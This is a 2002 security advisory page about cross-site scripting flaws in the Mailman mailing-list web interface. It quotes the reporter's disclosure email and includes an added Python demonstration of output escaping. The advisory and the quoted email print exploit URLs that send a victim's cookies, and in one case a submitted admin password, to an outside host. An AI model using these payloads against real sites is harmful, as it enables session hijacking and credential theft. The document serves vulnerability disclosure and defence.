SecurityTracker.com
Category:  Application (E-mail Server)  >  Mailman
Vendors:  GNU [multiple authors]
Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004844
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jul 26 2002
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Exploit Included:  Yes
Vendor Confirmed:  Yes
Version(s): 2.0.11 and prior versions
Description:  Some additional input validation vulnerabilities were reported in the Mailman mailing list software. A remote user could conduct cross-site scripting attacks against Mailman users.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable Mailman software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The following demonstration exploit URLs are provided:

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>
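
An added example, not part of the advisory and not Mailman's code: it shows why request values echoed into an attribute (`adminpw`) or into body text (`info`) can change the page's markup, and how escaping on output prevents that. The template, function names and sample inputs are constructed assumptions.

```python
import html
from html.parser import HTMLParser

# Hypothetical page that echoes two request parameters back to the browser
# (constructed for illustration; not Mailman's actual template).
TEMPLATE = (
    '<form action="/admin/ml-name" method="post">'
    '<input type="password" name="adminpw" value="{adminpw}"></form>'
    '<p>{info}</p>'
)

def render_unescaped(adminpw, info):
    """Pre-fix behaviour: request values are pasted into the markup as-is."""
    return TEMPLATE.format(adminpw=adminpw, info=info)

def render_escaped(adminpw, info):
    """Hardened: escape &, <, > and both quote characters on output."""
    return TEMPLATE.format(adminpw=html.escape(adminpw, quote=True),
                           info=html.escape(info, quote=True))

class TagShape(HTMLParser):
    """Records (tag, sorted attribute names) for every start tag."""
    def __init__(self):
        super().__init__()
        self.shape = []

    def handle_starttag(self, tag, attrs):
        self.shape.append((tag, tuple(sorted(name for name, _ in attrs))))

def markup_shape(page):
    parser = TagShape()
    parser.feed(page)
    parser.close()
    return parser.shape

# Shape of the page when the parameters hold harmless text.
BASELINE = markup_shape(render_escaped("x", "x"))

def input_changes_markup(render, adminpw, info):
    """True if request values added or altered tags/attributes in the page."""
    return markup_shape(render(adminpw, info)) != BASELINE

# Constructed inputs with the same structure as the URLs above: a quote that
# closes value="..." and adds an event-handler attribute, and a script element.
ATTR_BREAKOUT = '"/onClick="void(0)'
BODY_SCRIPT = '<script>void(0)</script>'

if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        print(render.__name__,
              input_changes_markup(render, ATTR_BREAKOUT, BODY_SCRIPT))
```

The same shape comparison can serve as a regression test for any template that reflects query parameters: render with hostile-looking input and require that the set of tags and attributes stays identical to the baseline.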

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the vulnerable software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  The vendor has released a fixed version (2.0.12), available at:

http://www.gnu.org/software/mailman/download.html

Vendor URL:  mail.python.org/pipermail/mailman-announce/2002-July/000043.html
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  office <office@office.ac>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 29 2002 (Red Hat Issues Fix for Red Hat Linux 7.2 and 7.3) Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks   (bugzilla@redhat.com)
Red Hat has released a fix for Red Hat Linux 7.2 and 7.3.
Sep 4 2002 (Conectiva Issues Fix) Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks   (secure@conectiva.com.br)
Conectiva has released a fix.



 Source Message Contents

Date:  Wed, 24 Jul 2002 17:03:30 +0900
From:  office <office@office.ac>
Subject:  cross-site scripting bug of Mailman

 

Mailman: cross-site scripting bug

Product: Mailman
Affected Version: 2.0.11 and under it
Vendor's URL: http://www.gnu.org/software/mailman/
Solution: Use fixed version 2.0.12 or later


Introduction:
------------
Mailman is software to help manage electronic mail discussion lists, much 
like Majordomo or Smartmail. And Mailman has a web interface system.


Example:
-----------------
This is a simple example for version 2.0.10:
You can recognize the vulnerability with this type of URL:

http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

and that proves that any (malicious) script code is possible on the web interface part of Mailman.

For example, if you access this URL with Internet Explorer (other browsers are not affected by the URL), the page looks similar to the real one, but the admin password you enter and submit is sent to another malicious site (http://www.office.ac/). This URL is valid for version 2.0.10.

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

And Mailman 2.0.11 still has vulnerabilities: if you access these URLs with Internet Explorer (other browsers are not affected by these URLs), your cookie information for the mailman_site could be sent to another malicious site (http://www.office.ac/).

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>


Vendor's response:
--------------
The vendor was notified about the first problem on 20th of May 2002. On the same 20th May 2002, version 2.0.11 was released.
http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

And the vendor was notified about the other problems on 21st of May 2002. The fixed version 2.0.12 was released on 11th of Jul 2002.
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html


Solution:
--------------
Users should upgrade to Mailman 2.0.12 or later

-- 
office
office@ukky.net
office@office.ac
http://www.office.ac/



Copyright 2002, SecurityGlobal.net LLC